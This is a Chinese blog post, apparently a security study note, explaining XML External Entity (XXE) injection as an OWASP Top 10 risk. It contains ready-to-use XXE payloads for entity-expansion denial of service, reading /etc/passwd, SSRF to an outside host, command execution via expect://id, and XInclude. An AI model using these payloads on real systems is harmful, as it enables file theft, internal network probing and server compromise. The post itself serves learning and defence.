OWASP TOP 10-XML外部实体(XXE)

最新推荐文章于 2024-07-17 10:55:51 发布
最新推荐文章于 2024-07-17 10:55:51 发布
阅读量574 收藏
点赞数
分类专栏: 安全笔记 文章标签: xml 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/134249638
版权

文章目录

XML基础

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

XML外部实体注入简称XXE漏洞:XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

漏洞原理

允许引用外部实体时,可通过构造恶意的XML内容,导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等后果。一般的XXE攻击,只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,但是也可以通过Blind XXE的方式实现攻击。

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。

内部声明DTD

根元素 [元素声明]>

引用外部DTD

根元素 SYSTEM "文件名">

或者

根元素 PUBLIC "public_ID" "文件名">

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

内部声明实体

实体名称 "实体的值">

引用外部实体

实体名称 SYSTEM "URI">

或者

实体名称 PUBLIC "public_ID" "URI">

攻击方式

拒绝服务攻击

<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

若解析过程非常缓慢,则表示测试成功,目标站点可能有拒绝服务漏洞。 具体攻击可使用更多层的迭代或递归,也可引用巨大的外部实体,以实现攻击的效果。

文件读取

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>

SSRF

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data (#ANY)>
]>
<data>4</data>

RCE

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>

XInclude

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>

未知攻焉知防——XXE漏洞攻防
https://security.tencent.com/index.php/blog/msg/69

sec0nd_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OWASP TOP10系列之#TOP4# A4-XML 外部实体 (XXE)
weixin_43125873的博客
08-14 272
OWASP TOP10系列之#TOP4# A4-XML 外部实体 (XXE) 文章目录OWASP TOP10系列之#TOP4# A4-XML 外部实体 (XXE)前言一、XXE是什么?二、什么情况会造成XXE三、如何预防总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、XXE是什么? XML External Entities
0.OWASP Top 10 - 2021
qwsn
12-24 1655
介绍 欢迎来到 OWASP Top 10 - 2021 欢迎来到 OWASP Top 10 的最新一期!OWASP Top 10 2021 是全新的,具有新的图形设计和可用的一页信息图,您可以打印或从我们的主页获取。 非常感谢为本次迭代贡献时间和数据的所有人。没有你,这一期就不会发生。谢谢! 2021 年前 10 名发生了什么变化 有三个新类别,四个类别的命名和范围发生了变化,并在 2021 年的前 10 名中进行了一些整合。我们在必要时更改了名称,以关注根本原因而不是症状。 A01:2021-Brok
OWASP Top 10 详细解读
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
02-24 1808
A01:2021-访问控制破坏从第五位上升。94%的应用程序进行了某种形式的访问控制中断测试。映射到Broken Access Control的34个通用缺陷枚举(CWE)在应用程序中的出现次数比任何其他类别都多。A02:2021-加密机制失效上升一位至第2位。以前称为敏感数据暴露,这是普遍的现象,而不是根本原因。这里重新关注的是与加密相关的故障,这些故障通常会导致敏感数据暴露或系统受损。A03:2021-注入下滑至第3位。
OWASP TOP10(2017)之【XML 外部实体XXE)】
qq_41042211的博客
07-20 343
XML以及XXE漏洞介绍 XML是指可扩展标记语言,用来传输和存储数据。XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素。XML的焦点是数据的内容,它把数据从HTML分离,是独立于软件和硬件的信息传输工具。HTML旨在显示信息,XML旨在传输和存储信息。 XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML时,没有禁止外部实体的加载,导致客家在恶意外部文件,造成文件读取,命令执行,内网端口扫描,攻击内网网
OWASP top 10 (2017) 学习笔记--XML外部实体XXE
weixin_30474613的博客
01-09 129
A4:2017-XML 外部实体(XXE) 漏洞描述: 如果攻击者可以上传XML文档或者在XML文档中添加恶意内容,通过易受攻击的代码、依赖项或集成,他们就能够攻击含有缺陷的XML处理器。 漏洞影响: 攻击者可以利用XML外部实体窃取使用URI文件处理器的内部文件和共享文件、监听内部扫描端口、执行远程代码和实施拒绝服务攻击。 检测场景: 以下提供几种简单的Payload模型。 1、文...
OWASP TOP 10 -- 2017
小英雄颂人头
02-12 457
#00x1 – 注入          将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入,NoSQL注入,OS注入和LDAP注入的注入缺陷.攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据.          产生原因: 用户提供的数据没有经过应用程序的验证,过滤或净化. 动态查询语句或非参数化的调用,在没有上下文感知转义的情况下,被用...
webgoat- XML External Entity-XXE-XML实体注入
seanyang_的博客
11-01 938
XML 外部实体攻击是针对解析 XML 输入的应用程序的一种攻击。当包含对外部实体的引用的 XML 输入由配置较弱的 XML 解析器处理时,就会发生此攻击。这种攻击可能会导致机密数据泄露、拒绝服务、服务器端请求伪造、从解析器所在机器的角度进行端口扫描以及其他系统影响。攻击可能包括使用 file: 方案或系统标识符中的相对路径来泄露本地文件,其中可能包含密码或私人用户数据等敏感数据。
OWASP top10(2013-2021)
m0_56632799的博客
12-22 1299
OWASP top10
OWASPTOP10--2021中文版.rar
06-26
4. **A4: XML外部实体XXE)** XXE攻击利用XML解析器的漏洞,读取服务器上的文件或执行系统命令。禁用XML外部实体或使用安全配置的XML解析器是防止此类攻击的有效手段。 5. **A5: 外部可控制的渲染(XXR)** ...
DVWA靶场,集成了owasp top 10漏洞
03-28
7. A7:XML外部实体XML External Entities, XXE) - 当XML解析器处理包含恶意外部实体XML文档时,可能导致信息泄露或拒绝服务。在DVWA中,你可以学习如何构造XXE攻击。 8. A8:不安全的直接对象引用(Insecure ...
OWASP Top 10 2017-en-ch.rar
12-06
OWASP Top 10 2017 中文-英文 版本。...四、XML外部实体XXE) 五、失效的访问控制 六、安全配置错误 七、跨站脚本攻击(XSS) 八、不安全的反序列化 九、使用含有已知漏洞的组件 十、不足的日志记录和监控
OWASP Top 10 2017 v1.3中文最新版.pdf
08-25
4. **A4:2017 - XML外部实体XXE)**:XML解析器的漏洞,允许攻击者读取服务器上的文件或执行远程代码。 5. **A5:2017 - 失效的访问控制**:如果应用程序没有正确实施权限和角色管理,攻击者可能获取不应有的访问...
2004&2007&2010&2013&2017 OWASP TOP 10.rar
04-12
4. XML外部实体XXE):XML解析器的漏洞利用。 5. API安全:随着API广泛使用,其安全性成为焦点。 从这些版本的变化可以看出,Web应用安全问题不断演变,新的威胁和攻击技术不断出现。开发者和安全从业者需要持续...
dom4j 操作 xml 之按照顺序插入标签
qq_66452396的博客
07-17 146
以上添加了详细注释的代码,读者可以直接拿来用,需要修改的部分是获取指定元素的名称以及 tagNames 数组。最近学了一下 dom4j 操作 xml 文件,特此记录一下。如果能给你带来帮助,那将是我的荣幸。
java序列化与反系列化,serializable原理,Parcelable接口原理解析,Json,XML
最新发布
qq_34358193的博客
07-17 616
Java的序列化和反序列化是用于对象的持久化和传输的重要机制。
XML 验证器:确保数据完整性和准确性的关键工具
wjs2024的博客
07-15 426
XML验证器是一种软件工具,用于检查XML文档是否符合特定的结构和内容规则。这些规则通常定义在一个或多个XML模式(XML Schema)或文档类型定义(DTD)中。通过验证XML文档,可以确保数据的一致性、准确性和可靠性。
mybatis的xml中,where标签不自动删除多余的and之类的问题
thels_的博客
07-16 232
原来是注释导致的问题。我在idea使用的一键注释/* */,可能mybatis误以为这是一个内容,然后就觉得这个内容后面需要一个and来连接下面的sql语句,所以就不删除。遇到了这个莫名其妙的问题,起初是很疑惑的,where标签好像失灵了一般不会自动删除掉 多余的and。也就是说条件前面不能出现/* */这样的注释。看了眼sql语句,发现还是有and没被删除。哈哈,有时候碰到一些奇怪的事情真的有点难绷。后来重新写了遍后发现又没事了。然后就研究了好一会,发现!把注释挪开就没事了!
XML 解析异常问题解决
szial的专栏
07-15 637
XML 中,实体扩展(Entity Expansion)指的是对 XML 实体(Entities)的引用和替换。实体XML 中的一种构造,它允许在文档中定义和使用替代符号,以减少冗余或增强可读性。实体可以是字符实体、参数实体外部实体
OWASP Top 10 2017:最严重的Web安全风险
4. A4:XML外部实体XML External Entity, XXE) 当XML解析器处理包含外部实体引用的恶意XML文档时,可能会导致敏感信息泄漏或服务器资源的滥用。 5. A5:脆弱的依赖性管理(Broken Dependency Management) 这是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值